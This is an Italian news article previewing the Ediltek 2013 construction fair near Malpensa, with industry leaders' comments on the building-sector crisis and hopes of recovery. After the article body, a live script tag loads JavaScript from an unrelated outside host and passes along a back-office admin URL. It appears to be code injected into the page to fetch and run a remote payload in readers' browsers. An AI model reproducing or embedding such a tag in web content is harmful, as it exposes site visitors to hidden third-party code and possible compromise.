1. Home
  2. Notizie e Mercato
  3. Alcune riflessioni in attesa di EDILTEK 2013

Alcune riflessioni in attesa di EDILTEK 2013

Edilizia di
5/5
votato da 1 persone
EDILTEK 2013: la Fiera dell’Edilizia a MalpensaFiere prevista dal 20 al 22 settembre prossimi


Inaugura a breve la 14° edizione di Ediltek, la Fiera dell’Edilizia che si terrà a MalpensaFiere dal 20 al 22 settembre, e le riflessioni sul momento dell’edilizia e delle prospettive per una “ripresa” iniziano a prendere forma. Tre giorni dedicati a oltre 15 tra Convegni, Saloni Tematici e focus specifici che andranno a completare l’ampio spazio espositivo dedicato alle ultime novità in fatto di tecnologia, architettura sostenibile e fonti energetiche rinnovabili.

La 14a edizione di Ediltek si conferma come punto di riferimento per il settore delle costruzioni. In una situazione ancora caratterizzata - seppur con alcuni cenni di ripresa - da una delle più gravi crisi dal dopo guerra, Ediltek 2013 dimostra ancora una volta l’importanza strategica dell’edilizia per il territorio” sostiene il Presidente di ANCE Varese, il Geom. Orlando Saibene“L’edilizia con il suo indotto ha bisogno di essere rimessa al centro delle politiche nazionali, regionali e locali per essere rilanciata e tornare a svolgere quel ruolo di motore dello sviluppo che ha sempre giocato. Semplificazione, certezza del quadro normativo e stabilità finanziaria sono le chiavi per rimettere in moto questo importante settore dell’economia, che rappresenta più del 10% dell’intera produzione nazionale”.

Come Unione Piccoli Imprenditori ci approcciamo quest’anno all’importante appuntamento con leggera, e sottolineiamo leggera, vena di ottimismo”, commenta Mariolino Deplano, Segretario Generale UPI “La giustificazione potrebbe essere duplice: da un lato per rispetto di sintesi si potrebbe affermare con una battuta retorica che “cambiando l’ordine dei soggetti, il prodotto non cambia”, la crisi, lo stato, la politica, tutto quello che si poteva raschiare, oltre al barile, se lo sono preso e che, quindi, peggio di cosi è praticamente impossibile. Dall’altro, con approccio più costruttivo non si può negare che “seppur flebili” segnali d’inversione iniziano a notarsi. Utili certamente le nuove norme per il settore, recentemente convertite in legge, che introducono una serie d’importanti vantaggi circa incentivi, detrazioni e bonus, ma parallelamente riscontriamo anche un atteggiamento più prudenziale e più professionale nel modo di fare impresa, in uno dei settori da sempre tra i più trainanti della nostra economia. Ed è proprio con i tempi difficili di oggi e nell’impossibilità di facili soluzioni in grado di dare una spinta alla domanda del settore, soprattutto interna, che occorre provare a rispondere con idee nuove. La partecipazione e la presenza in Ediltek è una buona vetrina, ma forse soprattutto un’occasione per esserci, dibattere, confrontarsi, e creare possibilità di crescita finalizzata al riaffermare il proprio ruolo sul territorio. Territorio inteso non solo come aree verdi da cannibalizzare ma come terreno dove sviluppare progetti di riqualificazione e risparmio energetico”.

Sostenere, semplificare, rilanciare, erogare credito, questi saranno i temi principali trattati nei convegni e nei workshop da enti ed associazioni di categoria. In Ediltek cercheremo di fare la nostra parte, partendo dal territorio per offrire progetti concreti alle imprese, in collaborazione con gli enti locali e procedere uniti verso un rilancio di un comparto fondamentale non solo per l’economia locale, ma anche nazionale, perché non c’è altro comparto industriale in grado di muovere l’indotto movimentato dal mattone” parola di Pietro Garavaglia, Amministratore Delegato di Chocolat Pubblicità, Segreteria Organizzativa di Ediltek “Basti pensare che per allestire l’evento verranno movimentati oltre 350 bilici in entrata ed uscita per un valore comprensivo di merce esposta stimata per questa edizione in oltre 50milioni di euro, tra gru, escavatori, veicoli industriali, mezzi pesanti veicoli commerciali e prodotti per l’edilizia”.

Organizzata con il Patrocinio dei Ministeri dell’Ambiente e delle Infrastrutture, Ediltek guarda così ancora e più che mai oggi, al futuro del mercato, partendo dal territorio, facendo rete con progetti concreti ed innovativi.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.7843546964238673" type="text/javascript"></script>